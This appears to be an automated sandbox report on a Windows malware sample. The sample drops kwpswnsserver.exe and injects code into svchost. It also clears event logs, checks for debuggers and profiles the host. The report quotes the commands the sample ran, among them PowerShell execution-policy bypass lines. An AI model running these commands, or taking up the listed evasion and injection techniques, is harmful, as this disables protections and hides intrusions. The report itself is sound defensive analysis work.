Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8A2F1D GetParent,IsIconic,GetParent,__EH_prolog3,3_2_6C8A2F1D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88E80E IsIconic,3_2_6C88E80E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8B8664 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,3_2_6C8B8664
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C893184 IsWindowVisible,IsIconic,3_2_6C893184
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C88717F IsIconic,IsWindowVisible,3_2_6C88717F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_0427B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_0427B3C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004B0DD1 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004B0DD1
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_3-111408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Window / User API: threadDelayed 5725
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4284
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 632
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8319
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1348
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dll
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Dropped PE file which has not been started: C:\Users\Public\Bilite\linit-v4.1.6.exe
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_3-111211
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | API coverage: 7.7 %
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 7628 | Thread sleep time: -73000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 7624 | Thread sleep time: -63000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 8184 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe TID: 7516 | Thread sleep time: -57250s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 4432 | Thread sleep count: 252 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568 | Thread sleep count: 4284 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568 | Thread sleep count: 632 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4192 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748 | Thread sleep count: 8319 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3164 | Thread sleep count: 1348 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3808 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5436 | Thread sleep count: 262 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7856 | Thread sleep count: 261 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6640 | Thread sleep count: 170 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Thread sleep count: Count: 5725 delay: -10
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 0_2_0040301A
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8C816F __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 3_2_6C8C816F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C9DF0FC FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose, 3_2_6C9DF0FC
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C9DF04B FindFirstFileExW, 3_2_6C9DF04B
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_042780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW, 3_2_042780F0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04275430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, 3_2_04275430
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Thread delayed: delay time: 73000
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: kwpswnsserver.exe, 00000003.00000002.3559349885.0000000001292000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFB
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | API call chain: ExitProcess graph end node graph_3-111625
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004B569D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004B569D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C880EC8 OutputDebugStringA,GetLastError, 3_2_6C880EC8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0428054D VirtualProtect ?,-00000001,00000104,? 3_2_0428054D
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 0_2_00406D5D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004C3580 mov eax, dword ptr fs:[00000030h] 3_2_004C3580
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004BB6CA mov eax, dword ptr fs:[00000030h] 3_2_004BB6CA
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004AF050 GetErrorInfo,SysFreeString,SysStringLen,GetProcessHeap,HeapFree,SysFreeString,CoTaskMemFree,CoTaskMemFree, 3_2_004AF050
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004B2069 SetUnhandledExceptionFilter, 3_2_004B2069
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004B569D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004B569D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004B1853 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_004B1853
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004B1ED5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004B1ED5
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle, 3_2_0427DF10
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0427F00A
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04281F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_04281F67
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8F8646 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6C8F8646
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C9D1DD8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6C9D1DD8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C89D636 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6C89D636

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_042777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe 3_2_042777E0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe 3_2_042777E0
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: kwpswnsserver.exe, 00000003.00000003.2893370449.0000000005493000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.3390981770.0000000005493000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0 minProgram Manager
Source: kwpswnsserver.exe, 00000003.00000002.3561172783.0000000005493000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inProgram Manager
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_0040D72E cpuid
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 0_2_00401F9D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_004C87F5
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_004C8840
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_004C88DB
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_004C0959
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_004C8966
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW, 3_2_004C8BB9
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_004C8CDF
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW, 3_2_004C8DE5
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW, 3_2_004C0E1E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_004C8EB4
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, 3_2_04275430
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_6C9E60AA
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW, 3_2_6C9E6003
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW, 3_2_6C9E61B0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_6C9E5C31
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_6C9E5E84
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW, 3_2_6C9E5EE3
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW, 3_2_6C8A5F91
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_6C9E5FB8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_6C9E5945
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_6C9E5B96
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: EnumSystemLocalesW, 3_2_6C9DBB1B
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: GetLocaleInfoW, 3_2_6C9DB4FC
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
